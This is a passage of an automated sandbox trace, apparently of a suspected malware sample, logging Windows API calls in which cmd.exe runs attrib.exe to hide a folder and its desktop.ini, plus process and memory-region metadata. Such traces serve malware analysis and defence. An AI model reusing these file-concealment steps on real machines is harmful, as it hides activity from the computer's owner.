lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.012] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.012] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.012] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.012] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.012] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.013] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.013] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.013] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.013] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.013] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.013] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.013] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.013] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.013] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.013] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.014] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.014] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.014] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.014] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.014] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.014] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.014] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.014] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.014] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.014] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.016] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.016] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.016] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.016] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.016] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.016] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.016] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.016] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.016] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.017] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.017] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.017] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.017] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.017] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.017] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.017] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.017] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.017] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.017] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.017] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.017] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.018] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.018] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0133.034] _close (_FileHandle=4) returned 0 [0133.034] FindNextFileW (in: hFindFile=0x1c0778, lpFindFileData=0x12ef58 | out: lpFindFileData=0x12ef58) returned 0 [0133.035] GetLastError () returned 0x12 [0133.035] FindClose (in: hFindFile=0x1c0778 | out: hFindFile=0x1c0778) returned 1 [0133.035] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0133.037] _close (_FileHandle=3) returned 0 [0133.038] GetConsoleTitleW (in: lpConsoleTitle=0x12f390, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.038] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0133.038] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0133.038] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0133.038] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x12ec2c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ec2c) returned 0xffffffff [0133.038] GetLastError () returned 0x2 [0133.038] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x12ec2c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ec2c) returned 0xffffffff [0133.038] GetLastError () returned 0x2 [0133.038] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x12ec2c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ec2c) returned 0x1c0778 [0133.039] FindClose (in: hFindFile=0x1c0778 | out: hFindFile=0x1c0778) returned 1 [0133.039] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x12ec2c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ec2c) returned 0xffffffff [0133.039] GetLastError () returned 0x2 [0133.039] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x12ec2c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ec2c) returned 0x1c0778 [0133.039] FindClose (in: hFindFile=0x1c0778 | out: hFindFile=0x1c0778) returned 1 [0133.039] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0133.039] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0133.039] GetConsoleTitleW (in: lpConsoleTitle=0x12f124, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.039] InitializeProcThreadAttributeList (in: lpAttributeList=0x12efac, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x12f074 | out: lpAttributeList=0x12efac, lpSize=0x12f074) returned 1 [0133.039] UpdateProcThreadAttribute (in: lpAttributeList=0x12efac, dwFlags=0x0, Attribute=0x60001, lpValue=0x12f06c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x12efac, lpPreviousValue=0x0) returned 1 [0133.039] GetStartupInfoW (in: lpStartupInfo=0x12ef68 | out: lpStartupInfo=0x12ef68*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0133.039] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0133.039] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x12f008*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12f054 | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" ", lpProcessInformation=0x12f054*(hProcess=0x4c, hThread=0x50, dwProcessId=0xa48, dwThreadId=0xbd8)) returned 1 [0133.041] CloseHandle (hObject=0x50) returned 1 [0133.041] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0133.041] GetEnvironmentStringsW () returned 0x1c2ce0* [0133.041] FreeEnvironmentStringsW (penv=0x1c2ce0) returned 1 [0133.041] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0133.079] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x12ef48 | out: lpExitCode=0x12ef48*=0x0) returned 1 [0133.079] CloseHandle (hObject=0x4c) returned 1 [0133.079] _vsnwprintf (in: _Buffer=0x12f090, _BufferCount=0x13, _Format="%08X", _ArgList=0x12ef54 | out: _Buffer="00000000") returned 8 [0133.079] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0133.080] GetEnvironmentStringsW () returned 0x1c2ce0* [0133.080] FreeEnvironmentStringsW (penv=0x1c2ce0) returned 1 [0133.080] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0133.080] GetEnvironmentStringsW () returned 0x1c2ce0* [0133.080] FreeEnvironmentStringsW (penv=0x1c2ce0) returned 1 [0133.080] DeleteProcThreadAttributeList (in: lpAttributeList=0x12efac | out: lpAttributeList=0x12efac) [0133.080] GetConsoleTitleW (in: lpConsoleTitle=0x12f390, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.080] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0133.080] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0133.080] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0133.080] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x12ec2c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ec2c) returned 0xffffffff [0133.080] GetLastError () returned 0x2 [0133.081] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x12ec2c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ec2c) returned 0xffffffff [0133.081] GetLastError () returned 0x2 [0133.081] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x12ec2c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ec2c) returned 0x1c0778 [0133.081] FindClose (in: hFindFile=0x1c0778 | out: hFindFile=0x1c0778) returned 1 [0133.081] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x12ec2c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ec2c) returned 0xffffffff [0133.081] GetLastError () returned 0x2 [0133.081] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x12ec2c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12ec2c) returned 0x1c0778 [0133.081] FindClose (in: hFindFile=0x1c0778 | out: hFindFile=0x1c0778) returned 1 [0133.081] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0133.081] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0133.081] GetConsoleTitleW (in: lpConsoleTitle=0x12f124, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0133.081] InitializeProcThreadAttributeList (in: lpAttributeList=0x12efac, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x12f074 | out: lpAttributeList=0x12efac, lpSize=0x12f074) returned 1 [0133.081] UpdateProcThreadAttribute (in: lpAttributeList=0x12efac, dwFlags=0x0, Attribute=0x60001, lpValue=0x12f06c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x12efac, lpPreviousValue=0x0) returned 1 [0133.081] GetStartupInfoW (in: lpStartupInfo=0x12ef68 | out: lpStartupInfo=0x12ef68*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0133.081] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0133.082] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x12f008*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12f054 | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\"", lpProcessInformation=0x12f054*(hProcess=0x50, hThread=0x4c, dwProcessId=0xbe0, dwThreadId=0xbc0)) returned 1 [0133.083] CloseHandle (hObject=0x4c) returned 1 [0133.083] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0133.083] GetEnvironmentStringsW () returned 0x1c37b0* [0133.083] FreeEnvironmentStringsW (penv=0x1c37b0) returned 1 [0133.083] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0133.127] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x12ef48 | out: lpExitCode=0x12ef48*=0x0) returned 1 [0133.127] CloseHandle (hObject=0x50) returned 1 [0133.127] _vsnwprintf (in: _Buffer=0x12f090, _BufferCount=0x13, _Format="%08X", _ArgList=0x12ef54 | out: _Buffer="00000000") returned 8 [0133.127] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0133.127] GetEnvironmentStringsW () returned 0x1c37b0* [0133.127] FreeEnvironmentStringsW (penv=0x1c37b0) returned 1 [0133.127] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0133.127] GetEnvironmentStringsW () returned 0x1c37b0* [0133.127] FreeEnvironmentStringsW (penv=0x1c37b0) returned 1 [0133.127] DeleteProcThreadAttributeList (in: lpAttributeList=0x12efac | out: lpAttributeList=0x12efac) [0133.127] _get_osfhandle (_FileHandle=1) returned 0x7 [0133.127] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0133.127] _get_osfhandle (_FileHandle=1) returned 0x7 [0133.127] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0133.128] _get_osfhandle (_FileHandle=0) returned 0x3 [0133.128] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0133.128] SetConsoleInputExeNameW () returned 0x1 [0133.128] GetConsoleOutputCP () returned 0x1b5 [0133.128] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0133.128] SetThreadUILanguage (LangId=0x0) returned 0x409 [0133.128] exit (_Code=0) Process: id = "118" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16640" os_pid = "0xbf8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "117" os_parent_pid = "0xa70" cmd_line = "attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12695 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12696 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12697 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12698 start_va = 0xb0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 12699 start_va = 0xa00000 end_va = 0xa06fff entry_point = 0xa00000 region_type = mapped_file name = 